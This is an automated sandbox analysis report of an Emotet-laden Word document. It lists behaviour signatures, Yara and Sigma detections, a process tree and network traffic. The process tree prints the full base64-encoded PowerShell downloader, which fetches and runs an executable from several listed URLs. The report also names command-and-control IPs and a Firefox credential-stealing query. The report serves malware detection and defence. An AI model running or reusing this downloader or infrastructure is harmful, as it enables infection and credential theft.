Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.Exploit.Siggen2.12917.8592.9111

Overview

General Information

Sample Name:	SecuriteInfo.com.Exploit.Siggen2.12917.8592.9111 (renamed file extension from 9111 to doc)
Analysis ID:	255713
MD5:	84b4a3bdfd680dc3fde940f31a74dc97
SHA1:	e0ca5c78044b5feee5e67dc4e74a7420d5705f05
SHA256:	501948f523c9bce4662fe102da5d632e953fccc2f521565eabc8f424297a4f1f
Most interesting Screenshot:

Detection

Emotet MailPassView

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Emotet Banking Trojan found

Malicious encrypted Powershell command line found

Malicious sample detected (through community Yara rule)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Emotet

Yara detected Emotet Downloader

Yara detected MailPassView

Allocates memory in foreign processes

Changes security center settings (notifications, updates, antivirus, firewall)

Creates processes via WMI

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Document contains an embedded VBA with many randomly named variables

Drops PE files to the user root directory

Drops executables to the windows directory (C:\Windows) and starts them

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Encrypted powershell cmdline option found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Modifies the context of a thread in another process (thread injection)

PowerShell case anomaly found

Powershell drops PE file

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file access)

Very long command line found

Writes to foreign memory regions

Yara detected WebBrowserPassView password recovery tool

AV process strings found (often used to terminate AV products)

Allocates a big amount of memory (probably used for heap spraying)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Drops PE files

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Process Creation

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w10x64

WINWORD.EXE (PID: 6740 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)

powershell.exe (PID: 6888 cmdline: powersheLL -e JABHAFMASgBLAE8AdABrAGoAPQAnAEgAUQBGAFEAVwB6AGUAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AGAAUgBgAEkAVAB5AFAAcgBgAG8AVABPAGMATwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQAUwBYAEwAVQBQAGcAdwBpACAAPQAgACcANQA0ADUAJwA7ACQAVwBBAFEATABOAG8AdwBoAD0AJwBPAEgASQBFAFoAeQBoAHUAJwA7ACQAUQBMAFMASgBLAGkAcQBhAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABTAFgATABVAFAAZwB3AGkAKwAnAC4AZQB4AGUAJwA7ACQARwBXAFoAWgBCAGoAagBqAD0AJwBDAEEATABRAEIAcwB1AG0AJwA7ACQAUgBOAFoATABNAHAAZQB6AD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAEUAVAAuAFcARQBCAEMATABpAEUATgBUADsAJABGAEwAWQBDAE4AaQBwAGUAPQAnAGgAdAB0AHAAOgAvAC8AagBrAG4AYwByAGUAdwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAEsAaABTAE8AMQA2AFoAQQBBAGYALwAqAGgAdAB0AHAAOgAvAC8AagBtAGwAYQBuAGQAcwBjAGEAcABpAG4AZwBzAGUAcgB2AGkAYwBlAC4AYwBvAG0ALwBjAG8AbgB0AGUAbgB0AC8AZgBoAEcAQQBmAEsAcwAvACoAaAB0AHQAcAA6AC8ALwBqAGkAbQBsAG8AdwByAHkALgBjAG8AbQAvAGQAbABxAEMAVABjADAAMQBwAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbABlAHMAbABpAGUAbQBvAG4AdABlAG4AZQBnAHIAbwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ASQAxAGgASABxAEQARQA2AC8AKgBoAHQAdABwADoALwAvAGoAbwBoAG4AawBlAGEAbgBlAHMAdAB1AGQAaQBvAHMALgBjAG8AbQAvAHIAMAAwAHQALwB2AEEAVwBFAGwAUgBtAC8AJwAuACIAUwBQAEwAYABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABRAEcAVwBWAFMAbABkAHUAPQAnAFkATQBHAFIAUABmAGIAZwAnADsAZgBvAHIAZQBhAGMAaAAoACQASgBXAFAAQQBJAGoAbwBtACAAaQBuACAAJABGAEwAWQBDAE4AaQBwAGUAKQB7AHQAcgB5AHsAJABSAE4AWgBMAE0AcABlAHoALgAiAEQAbwBXAGAATgBMAG8AQQBgAEQARgBpAEwARQAiACgAJABKAFcAUABBAEkAagBvAG0ALAAgACQAUQBMAFMASgBLAGkAcQBhACkAOwAkAEMAWABaAEcAQwBkAGEAdAA9ACcAVgBYAEYAUQBKAG4AcABxACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQAUQBMAFMASgBLAGkAcQBhACkALgAiAGwAYABlAE4AZwB0AEgAIgAgAC0AZwBlACAAMwAwADIAMAA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAFIAYABlAEEAdABlACIAKAAkAFEATABTAEoASwBpAHEAYQApADsAJABLAEUATgBXAEgAcwBsAHcAPQAnAEwATABGAE8AVQBiAHMAcAAnADsAYgByAGUAYQBrADsAJABLAEUAUwBWAFkAZQBoAHgAPQAnAEkARABUAEIAWQBzAHcAdgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAEIAUgBOAFIAZwBzAGgAPQAnAFAASQBMAE8AUgB4AGYAZwAnAA== MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 6924 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

545.exe (PID: 5592 cmdline: C:\Users\user\545.exe MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)

utildll.exe (PID: 5512 cmdline: C:\Windows\SysWOW64\winipcfile\utildll.exe MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)

utildll.exe (PID: 4528 cmdline: 'C:\Windows\SysWOW64\winipcfile\utildll.exe' 'C:\Users\user\AppData\Local\Temp\4836.tmp' MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)

utildll.exe (PID: 6092 cmdline: 'C:\Windows\SysWOW64\winipcfile\utildll.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4F7A.tmp' MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)

utildll.exe (PID: 6112 cmdline: 'C:\Windows\SysWOW64\winipcfile\utildll.exe' /scomma 'C:\Users\user\AppData\Local\Temp\516F.tmp' MD5: 54859CE57FF8FE2666EB2EFF1441CDC0)

utildlloe.exe (PID: 6896 cmdline: 'C:\Windows\SysWOW64\winipcfile\utildlloe.exe' 'C:\Users\user\AppData\Local\Temp\4836.tmp' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

svchost.exe (PID: 4656 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6372 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 6428 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 6488 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 6500 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 6036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Documents\20200802\PowerShell_transcript.639509.qla+rpjA.20200802002217.txt	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x23:$s1: PowerShell 0xfd:$s1: powersheLL 0xfc9:$s1: PowerShell 0x23:$sr1: PowerShell 0xfc9:$sr1: PowerShell 0x23:$sn3: PowerShell 0xfc9:$sn3: PowerShell 0xff:$a1: wersheLL -e
C:\Users\user\Documents\20200802\PowerShell_transcript.639509.qla+rpjA.20200802002217.txt	JoeSecurity_EmotetDownloader	Yara detected Emotet Downloader	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.521515078.00000000032B0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000012.00000002.376962660.0000000000400000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000007.00000003.378182903.00000000038AD000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000007.00000003.378182903.00000000038AD000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000006.00000002.280422240.0000000002310000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000012.00000001.372848485.0000000000400000.00000040.00020000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000007.00000002.517780114.0000000000831000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.522501306.0000000003B20000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000003.377843447.0000000003580000.00000040.00000001.sdmp	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x147b0:$a1: logins.json 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x14f34:$s4: \mozsqlite3.dll 0x137a4:$s5: SMTP Password
00000007.00000003.377843447.0000000003580000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000007.00000002.517695012.0000000000820000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000006.00000002.280435292.0000000002321000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000013.00000001.374552977.0000000000400000.00000040.00020000.sdmp	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x147b0:$a1: logins.json 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x14f34:$s4: \mozsqlite3.dll 0x137a4:$s5: SMTP Password
00000013.00000001.374552977.0000000000400000.00000040.00020000.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000013.00000002.376864645.0000000000400000.00000040.00000001.sdmp	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x147b0:$a1: logins.json 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x14f34:$s4: \mozsqlite3.dll 0x137a4:$s5: SMTP Password
00000013.00000002.376864645.0000000000400000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000007.00000003.370836756.0000000003949000.00000004.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000003.370693681.00000000038AD000.00000004.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.522804129.0000000003CD0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000003.366823294.0000000002AE0000.00000004.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000003.378081455.0000000003E40000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: utildll.exe PID: 6112	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: utildll.exe PID: 6092	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: utildll.exe PID: 5512	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: utildll.exe PID: 5512	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Click to see the 20 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.utildll.exe.32b0000.4.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.utildll.exe.32b0000.4.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.utildll.exe.3cd0000.8.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.utildll.exe.3b20000.7.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
19.2.utildll.exe.400000.0.unpack	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x131b0:$a1: logins.json 0x13110:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x13934:$s4: \mozsqlite3.dll 0x121a4:$s5: SMTP Password
19.2.utildll.exe.400000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.3.utildll.exe.3580000.2.raw.unpack	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x147b0:$a1: logins.json 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x14f34:$s4: \mozsqlite3.dll 0x137a4:$s5: SMTP Password
7.3.utildll.exe.3580000.2.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.1.utildll.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.3.utildll.exe.3e40000.3.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.2.utildll.exe.3b20000.7.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.3.utildll.exe.3580000.2.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
19.2.utildll.exe.400000.0.raw.unpack	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x147b0:$a1: logins.json 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x14f34:$s4: \mozsqlite3.dll 0x137a4:$s5: SMTP Password
19.2.utildll.exe.400000.0.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
19.1.utildll.exe.400000.0.unpack	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x131b0:$a1: logins.json 0x13110:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x13934:$s4: \mozsqlite3.dll 0x121a4:$s5: SMTP Password
19.1.utildll.exe.400000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
19.1.utildll.exe.400000.0.raw.unpack	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x147b0:$a1: logins.json 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x14f34:$s4: \mozsqlite3.dll 0x137a4:$s5: SMTP Password
19.1.utildll.exe.400000.0.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.2.utildll.exe.400000.0.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.3.utildll.exe.3e40000.3.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.1.utildll.exe.400000.0.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.2.utildll.exe.3cd0000.8.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
18.2.utildll.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Click to see the 18 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Process Creation

Show sources

Source: Process started

Author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update): Data: Command: 'C:\Windows\SysWOW64\winipcfile\utildll.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4F7A.tmp', CommandLine: 'C:\Windows\SysWOW64\winipcfile\utildll.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4F7A.tmp', CommandLine|base64offset|contains: (f, Image: C:\Windows\SysWOW64\winipcfile\utildll.exe, NewProcessName: C:\Windows\SysWOW64\winipcfile\utildll.exe, OriginalFileName: C:\Windows\SysWOW64\winipcfile\utildll.exe, ParentCommandLine: C:\Windows\SysWOW64\winipcfile\utildll.exe, ParentImage: C:\Windows\SysWOW64\winipcfile\utildll.exe, ParentProcessId: 5512, ProcessCommandLine: 'C:\Windows\SysWOW64\winipcfile\utildll.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4F7A.tmp', ProcessId: 6092

Signature Overview

Click to jump to signature section

Show All Signature Results

Source: C:\Users\user\545.exe	Code function: 6_2_00444717 lstrlenA,FindFirstFileA,FindClose,	6_2_00444717
Source: C:\Users\user\545.exe	Code function: 6_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,	6_2_004390BA
Source: C:\Windows\SysWOW64\winipcfile\utildll.exe	Code function: 7_2_00444717 lstrlenA,FindFirstFileA,FindClose,	7_2_00444717
Source: C:\Windows\SysWOW64\winipcfile\utildll.exe	Code function: 7_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,	7_2_004390BA
Source: C:\Windows\SysWOW64\winipcfile\utildll.exe	Code function: 18_2_0040A1A7 FindFirstFileW,FindNextFileW,	18_2_0040A1A7
Source: C:\Windows\SysWOW64\winipcfile\utildll.exe	Code function: 18_1_0040A1A7 FindFirstFileW,FindNextFileW,	18_1_0040A1A7

Source: C:\Windows\SysWOW64\winipcfile\utildll.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\
Source: C:\Windows\SysWOW64\winipcfile\utildll.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
Source: C:\Windows\SysWOW64\winipcfile\utildll.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\
Source: C:\Windows\SysWOW64\winipcfile\utildll.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\
Source: C:\Windows\SysWOW64\winipcfile\utildll.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
Source: C:\Windows\SysWOW64\winipcfile\utildll.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

Source: winword.exe

Memory has grown: Private usage: 0MB later: 65MB

Source: global traffic

DNS query: name: jkncrew.com

Source: global traffic

TCP traffic: 192.168.2.3:49740 -> 185.94.252.13:443

Source: global traffic

TCP traffic: 192.168.2.3:49723 -> 50.31.160.189:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 50.31.160.189:80 -> 192.168.2.3:49723
Source: Traffic	Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.3:49740 -> 185.94.252.13:443

Source: global traffic	HTTP traffic detected: GET /cgi-bin/KhSO16ZAAf/ HTTP/1.1Host: jkncrew.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /content/fhGAfKs/ HTTP/1.1Host: jmlandscapingservice.comConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: POST /JeZbzs/Cmd7bG8P5G/ywpsU3EDDgca/yfGY7tf/UjNZcav71/ HTTP/1.1Referer: http://185.94.252.13/JeZbzs/Cmd7bG8P5G/ywpsU3EDDgca/yfGY7tf/UjNZcav71/Content-Type: multipart/form-data; boundary=---------------------------303308476707525User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /uPWiBqbjc/bfNLb/n3e4xA4IL2qE8YZeH/AYUkbtjPwa3iFoOYi8/6jL14rWQuU/AL8Dgb/ HTTP/1.1Referer: http://185.94.252.13/uPWiBqbjc/bfNLb/n3e4xA4IL2qE8YZeH/AYUkbtjPwa3iFoOYi8/6jL14rWQuU/AL8Dgb/Content-Type: multipart/form-data; boundary=---------------------------802471010945937User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /PMx1be2sKY7dhiY1/dC97ETJ0RahEi6A8/NPnXAB/LY6ug5VG46Uk8OoBQa/luBTtDDM/ HTTP/1.1Referer: http://185.94.252.13/PMx1be2sKY7dhiY1/dC97ETJ0RahEi6A8/NPnXAB/LY6ug5VG46Uk8OoBQa/luBTtDDM/Content-Type: multipart/form-data; boundary=---------------------------727120016898053User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /4KiHd4GoeAQXach/KjEdPGt0vC/kIHvyhe2pRtlKS0s/RjHIcnY2eCuZJVkp5Q/HJxB0xobwYH37hSEIip/0aZH6cqpcvQi2/ HTTP/1.1Referer: http://185.94.252.13/4KiHd4GoeAQXach/KjEdPGt0vC/kIHvyhe2pRtlKS0s/RjHIcnY2eCuZJVkp5Q/HJxB0xobwYH37hSEIip/0aZH6cqpcvQi2/Content-Type: multipart/form-data; boundary=---------------------------177700964308477User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4596Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /ybxxSm0NduJr/21PWG/5BiKx/AWjhrrKjVVl5ac9/pcFlZM25RbM5MdjKnZ/ HTTP/1.1Referer: http://185.94.252.13/ybxxSm0NduJr/21PWG/5BiKx/AWjhrrKjVVl5ac9/pcFlZM25RbM5MdjKnZ/Content-Type: multipart/form-data; boundary=---------------------------826509774945116User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6v6iac1tzc9jjbHG2/l1yGs2CoJVDYVFD0/ HTTP/1.1Referer: http://185.94.252.13/6v6iac1tzc9jjbHG2/l1yGs2CoJVDYVFD0/Content-Type: multipart/form-data; boundary=---------------------------403684127386855User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Mf04o60zoJs/cAkWwU/0UIp9fAdSvEBJ/g9TH9Tt/F5Z0WoD/wjQA/ HTTP/1.1Referer: http://88.217.172.65/Mf04o60zoJs/cAkWwU/0UIp9fAdSvEBJ/g9TH9Tt/F5Z0WoD/wjQA/Content-Type: multipart/form-data; boundary=---------------------------147600063783432User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 88.217.172.65:443Content-Length: 4356Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 73.116.193.136
Source: unknown	TCP traffic detected without corresponding DNS query: 73.116.193.136
Source: unknown	TCP traffic detected without corresponding DNS query: 73.116.193.136
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.94.252.13
